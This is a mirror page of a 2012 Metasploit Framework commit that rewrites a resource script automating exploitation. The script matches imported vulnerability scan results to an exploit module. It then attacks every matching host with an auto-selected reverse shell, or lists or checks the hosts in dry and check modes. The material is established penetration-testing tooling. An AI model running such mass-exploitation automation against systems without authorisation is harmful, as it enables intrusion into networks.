infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Rewrite how each mode is handled

unstable
sinn3r 2012-07-10 16:06:07 -05:00
parent b449c0e21c
commit ce107fbd6f
1 changed files with 49 additions and 29 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

78
scripts/resource/autoexploit.rc
View File

@ -1,4 +1,3 @@
<ruby> <ruby>
# #
# Print the help function # Print the help function
@ -6,25 +5,27 @@
def help_me def help_me
help = %Q| help = %Q|
Description: Description:
This Metasploit RC file can be used to automate the exploitation process. Before This Metasploit RC file can be used to automate the exploitation process. Before using the
using this script, you should import your vulnerability results to Metasploit, and script, you must import your vulnerability results to Metasploit so that it can deploy the
then it will exploit each possible host when there is a match to one of the module based on matching references. Three modes are available: exploit/dry/and check.
references. A reverse shell is automatically selected for you, and will always In exploit mode, it will attempt to gain access to all vulnerable hosts with the most
default to a suitable meterpreter. suitable reverse shell that's automatically selected. In "dry" mode (dry-run), it'll list
all the hosts vulnerable to the exploit. In check mode, it will only trigger the check()
function found in the module. If no mode is specified, then it'll default to 'exploit'.
Usage: Usage:
./msfconsole -r [rc_path] [db_user] [db_pass] [db_workspace] [module_path] [mode] ./msfconsole -r [rc_path] [db_user] [db_pass] [db_workspace] [module_path] [mode]
Arguments: Arguments:
rc_path - Full path to the RC script rc_path - Full path to the RC script
db_user - Username for MSF database (datastore: 'DB_USER') db_user - Username for MSF database (datastore: 'DB_USER')
db_pass - Password for MSF database (datastore: 'DB_PASS') db_pass - Password for MSF database (datastore: 'DB_PASS')
db_worksapce - Workspace for the database (datastore: 'DB_WORKSPACE') db_worksapce - Workspace for the database (datastore: 'DB_WORKSPACE')
module_path - Path to the exploit (datastore: 'MODULE') module_path - Path to the exploit (datastore: 'MODULE')
mode - Optional. Dry-run mode [dry/check] (datastore: 'MODE') mode - Optional. Accept:exploit/dry/check (datastore: 'MODE')
Example: Example of running an exploit:
msfconsole -r autoexploit.rc username password msf windows/smb/ms08_067_netapi dry msfconsole -r autoexploit.rc username password msf windows/smb/ms08_067_netapi
Authors: Authors:
sinn3r <sinn3r[at]metasploit.com> sinn3r <sinn3r[at]metasploit.com>
@ -114,7 +115,7 @@ end
# #
# Start the exploitation # Exploit mode
# #
def auto_exploit(module_path) def auto_exploit(module_path)
exploit = load_exploit(module_path) exploit = load_exploit(module_path)
@ -146,9 +147,9 @@ end
# #
# Find all mathing references # Dry-run mode
# #
def dry_run(module_path,mode) def dry_run(module_path)
exploit = load_exploit(module_path) exploit = load_exploit(module_path)
raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil? raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
@ -157,15 +158,29 @@ def dry_run(module_path,mode)
framework.db.workspace.vulns.each do |vuln| framework.db.workspace.vulns.each do |vuln|
next if not ref_has_match(vuln.refs, exploit_refs) next if not ref_has_match(vuln.refs, exploit_refs)
addr = vuln.host.address.to_s addr = vuln.host.address.to_s
print_good("#{addr} seems vulnerable to #{exploit.shortname}") print_good("#{addr} has a matching reference to #{exploit.shortname}")
if mode == "check" end
print_good("checking #{addr} with check mechanism of #{exploit.shortname}") end
run_single("use #{exploit.fullname}")
run_single("set RHOST #{addr}")
run_single("check") #
run_single("back") # Check mode
print_line("") #
end def check_exploit(module_path)
exploit = load_exploit(module_path)
raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
exploit_refs = exploit.references
framework.db.workspace.vulns.each do |vuln|
next if not ref_has_match(vuln.refs, exploit_refs)
print_good("Checking #{exploit.shortname} against host #{vuln.host.address.to_s}")
run_single("use #{exploit.fullname}")
run_single("set RHOST #{vuln.host.address.to_s}")
run_single("check")
select(nil, nil, nil, 1)
run_single("back")
print_line()
end end
end end
@ -198,7 +213,7 @@ def init_args
args[:db_pass] = ARGV.shift || datastore['DB_PASS'] || '' args[:db_pass] = ARGV.shift || datastore['DB_PASS'] || ''
args[:db_workspace] = ARGV.shift || datastore['DB_WORKSPACE'] || '' args[:db_workspace] = ARGV.shift || datastore['DB_WORKSPACE'] || ''
args[:module] = ARGV.shift || datastore['MODULE'] || '' args[:module] = ARGV.shift || datastore['MODULE'] || ''
args[:mode] = (ARGV.shift || datastore['MODE'] || '') args[:mode] = ARGV.shift || datastore['MODE'] || 'exploit'
raise ArgumentError, "Missing a module path" if args[:module].empty? raise ArgumentError, "Missing a module path" if args[:module].empty?
@ -223,10 +238,15 @@ begin
end end
end end
if (args[:mode] == "dry" or args[:mode] == "check") case args[:mode]
dry_run(args[:module], args[:mode]) when /^exploit$/i
else
auto_exploit(args[:module]) auto_exploit(args[:module])
when /^dry$/i
dry_run(args[:module])
when /^check$/i
check_exploit(args[:module])
else
raise ArgumentError, "Invalid mode"
end end
rescue ArgumentError => e rescue ArgumentError => e